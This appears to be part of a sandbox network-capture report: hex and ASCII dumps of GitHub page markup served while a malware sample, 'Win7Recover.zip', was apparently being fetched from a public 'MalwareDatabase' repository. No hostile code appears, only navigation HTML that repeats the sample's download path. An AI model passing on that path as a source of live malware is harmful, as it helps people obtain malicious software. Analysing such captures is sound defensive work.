                                                                                                                                                    2022-09-29 12:59:27 UTC38203INData Raw: 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6c 69 6e 6b 2d 65 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c 2d 69 63 6f 6e 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 30 2e 36 30 34 20 31 68 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 34 32 37 2e 31 37 37 4c 31 33 2e 30 33 20 34 2e 30 33 20 39 2e 32 38 20 37 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 37 35 2d 33 2e 37 35 2d 31 2e 35 34 33 2d 31 2e 35 34 33 41
                                                                                                                                                    Data Ascii: omponent="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path fill-rule="evenodd" d="M10.604 1h4.146a.25.25 0 01.25.25v4.146a.25.25 0 01-.427.177L13.03 4.03 9.28 7.78a.75.75 0 01-1.06-1.06l3.75-3.75-1.543-1.543A
                                                                                                                                                    2022-09-29 12:59:27 UTC38204INData Raw: 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 20 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 72 6f 75 6e 64 65 64 20 6d 2d 30 20 70 2d 30 20 70 79 2d 32 20 70 79 2d 6c 67 2d 34 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 6f 73 69 74 69 6f 6e 2d 6c 67 2d 61 62 73 6f 6c 75 74 65 20 6c 65 66 74 2d 30 20 6c 65 66 74 2d 6c 67 2d 6e 33 20 70 78 2d 6c 67 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 73 74 79 6c 65 2d 6e 6f 6e 65 20 66 35 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 70 62 2d 33 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 68 34 20 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 6d 79 2d 31 22 3e 42 79 20 50 6c 61 6e 3c 2f 6c 69 3e 0a 0a 20 20 20 20
                                                                                                                                                    Data Ascii: Menu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <ul class="list-style-none f5 border-bottom pb-3 mb-3"> <li class="h4 color-fg-default my-1">By Plan</li>
                                                                                                                                                    2022-09-29 12:59:27 UTC38205INData Raw: 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 6f 6d 70 61 72 65 20 61 6c 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 43 6f 6d 70 61 72 65 20 61 6c 6c 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 70 72 69 63 69 6e 67 23 63 6f 6d 70 61 72 65 2d 66 65 61 74 75 72 65 73 22 3e 0a 20 20 20 20 20 20 43 6f 6d 70 61 72 65 20 61 6c 6c 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20
                                                                                                                                                    Data Ascii: &quot;action&quot;:&quot;click to go to Compare all&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:Compare all;&quot;}" href="/pricing#compare-features"> Compare all </a></li>
                                                                                                                                                    2022-09-29 12:59:27 UTC38207INData Raw: 31 34 20 31 32 2e 32 35 76 2d 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 31 2e 35 20 30 76 33 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 68 2d 38 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 76 2d 38 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 30 2d 31 2e 35 68 2d 33 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d
                                                                                                                                                    Data Ascii: 14 12.25v-3.5a.75.75 0 00-1.5 0v3.5a.25.25 0 01-.25.25h-8.5a.25.25 0 01-.25-.25v-8.5a.25.25 0 01.25-.25h3.5a.75.75 0 000-1.5h-3.5z"></path></svg></a></li> <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-
                                                                                                                                                    2022-09-29 12:59:27 UTC38208INData Raw: 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 44 65 76 53 65 63 4f 70 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70
                                                                                                                                                    Data Ascii: "_blank" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to DevSecOps&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip
                                                                                                                                                    2022-09-29 12:59:27 UTC38209INData Raw: 53 74 6f 72 69 65 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 43 75 73 74 6f 6d 65 72 20 53 74 6f 72 69 65 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 63 75 73 74 6f 6d 65 72 2d 73 74 6f 72 69 65 73 22 3e 0a 20 20 20 20 20 20 43 75 73 74 6f 6d 65 72 20 53 74 6f 72 69 65 73 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f
                                                                                                                                                    Data Ascii: Stories&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:Customer Stories;&quot;}" href="/customer-stories"> Customer Stories </a></li> <li> <a class="HeaderMenu-dropdo
                                                                                                                                                    2022-09-29 12:59:27 UTC38211INData Raw: 6f 6e 2d 72 65 6c 61 74 69 76 65 20 66 6c 65 78 2d 77 72 61 70 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 73 2d 64 65 74 61 69 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 20 6a 73 2d 68 65 61 64 65 72 2d 6d 65 6e 75 2d 69 74 65 6d 22 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 62 6f 72 64 65 72 2d 30 20 77 69 64 74 68 2d 66 75 6c 6c 20 77 69 64 74 68 2d 6c 67 2d 61 75 74 6f 20 70 78 2d 30 20 70 78 2d 6c 67 2d 32 20 70
                                                                                                                                                    Data Ascii: on-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 p
                                                                                                                                                    2022-09-29 12:59:27 UTC38212INData Raw: 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 47 69 74 48 75 62 20 53 70 6f 6e 73 6f 72 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 73 70 6f 6e 73 6f 72 73 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 68 34 22 3e 47 69 74 48 75 62 20 53 70 6f 6e 73 6f 72 73 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 46 75 6e 64 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 64 65 76 65 6c 6f 70 65 72 73 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 73 74 79 6c 65 2d 6e 6f 6e 65 20
                                                                                                                                                    Data Ascii: er.zip;ref_cta:GitHub Sponsors;&quot;}" href="/sponsors"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> </a></li> </ul> <ul class="list-style-none
                                                                                                                                                    2022-09-29 12:59:27 UTC38213INData Raw: 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 54 6f 70 69 63 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 74 6f 70 69 63 73 22 3e 0a 20 20 20 20 20 20 54 6f 70 69 63 73 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65
                                                                                                                                                    Data Ascii: /rogues/Win7Recover.zip;ref_cta:Topics;&quot;}" href="/topics"> Topics </a></li> <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;cate
                                                                                                                                                    2022-09-29 12:59:27 UTC38215INData Raw: 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 6d 65 6e 75 20 74 6f 70 20 69 74 65 6d 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 50 72 69 63 69 6e 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 50 72 69 63 69 6e 67 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 70 72 69 63 69 6e 67 22
                                                                                                                                                    Data Ascii: quot;category&quot;:&quot;Header menu top item (logged out)&quot;,&quot;action&quot;:&quot;click to go to Pricing&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:Pricing;&quot;}" href="/pricing"
                                                                                                                                                    2022-09-29 12:59:27 UTC38216INData Raw: 6c 64 20 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 66 69 65 6c 64 20 69 73 2d 63 6c 65 61 72 61 62 6c 65 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 68 6f 74 6b 65 79 3d 73 2c 2f 0a 20 20 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 71 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 74 65 73 74 2d 73 65 6c 65 63 74 6f 72 3d 22 6e 61 76 2d 73 65 61 72 63 68 2d 69 6e 70 75 74 22 0a 20 20 20 20 20 20 20 20 20 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 75 6e 73 63 6f 70 65 64 2d 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 20 47 69 74 48 75 62 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 73 63 6f 70 65 64 2d 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68
                                                                                                                                                    Data Ascii: ld js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search
                                                                                                                                                    2022-09-29 12:59:27 UTC38217INData Raw: 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 0a 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 2d 30 20 66 35 20 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 22 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 3e 0a 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 75 6e 64 65
                                                                                                                                                    Data Ascii: ainer"> <ul class="d-none js-jump-to-suggestions-template-container"> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-suggestion" role="option"> <a tabindex="-1" class="no-unde
                                                                                                                                                    2022-09-29 12:59:27 UTC38219INData Raw: 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 2e 37 35 20 30 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 30 20 31 2e 37 35 76 31 32 2e 35 43 30 20 31 35 2e 32 31 36 2e 37 38 34 20 31 36 20 31 2e 37 35 20 31 36 68 31 32 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 36 20 31 34 2e 32 35 56 31 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 2e 32 35 20 30 48 31 2e 37 35 7a 4d 31 2e 35 20 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 48 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 56 31 2e 37 35 7a 4d 31 31 2e 37 35 20 33 61 2e 37
                                                                                                                                                    Data Ascii: l-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.7
                                                                                                                                                    2022-09-29 12:59:27 UTC38220INData Raw: 22 3e 0a 20 20 20 20 20 20 20 20 49 6e 20 74 68 69 73 20 75 73 65 72 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 67 6c 6f 62 61 6c 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 41 6c 6c 20 47 69 74 48 75 62 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c
                                                                                                                                                    Data Ascii: "> In this user </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle"></span> <
                                                                                                                                                    2022-09-29 12:59:27 UTC38221INData Raw: 67 20 74 69 74 6c 65 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 20 32 2e 35 41
                                                                                                                                                    Data Ascii: g title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A
                                                                                                                                                    2022-09-29 12:59:27 UTC38223INData Raw: 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 31 2e 35 20 37 61 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 31 31 2d 38 2e 39 39 38 20 30 41 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 30 31 31 31 2e 35 20 37 7a 6d
                                                                                                                                                    Data Ascii: " height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm
                                                                                                                                                    2022-09-29 12:59:27 UTC38224INData Raw: 20 20 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 20 20 0a 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 2d 30 20 66 35 20 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 77 6e 65 72 2d 73 63 6f 70 65 64 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 22 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 3e 0a 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 61 75 74 6f 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 75 6d 70 2d 74 6f 2d 73 75 67 67
                                                                                                                                                    Data Ascii: </a></li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-owner-scoped-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-sugg
                                                                                                                                                    2022-09-29 12:59:27 UTC38225INData Raw: 31 2e 37 35 76 31 32 2e 35 43 30 20 31 35 2e 32 31 36 2e 37 38 34 20 31 36 20 31 2e 37 35 20 31 36 68 31 32 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 36 20 31 34 2e 32 35 56 31 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 2e 32 35 20 30 48 31 2e 37 35 7a 4d 31 2e 35 20 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 48 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 56 31 2e 37 35 7a 4d 31 31 2e 37 35 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 37 2e 35 61 2e
                                                                                                                                                    Data Ascii: 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.
                                                                                                                                                    2022-09-29 12:59:27 UTC38227INData Raw: 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 67 6c 6f 62 61 6c 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 41 6c 6c 20 47 69 74 48 75 62 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 62 6f 72 64
                                                                                                                                                    Data Ascii: pan class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle"></span> </div> <div aria-hidden="true" class="bord
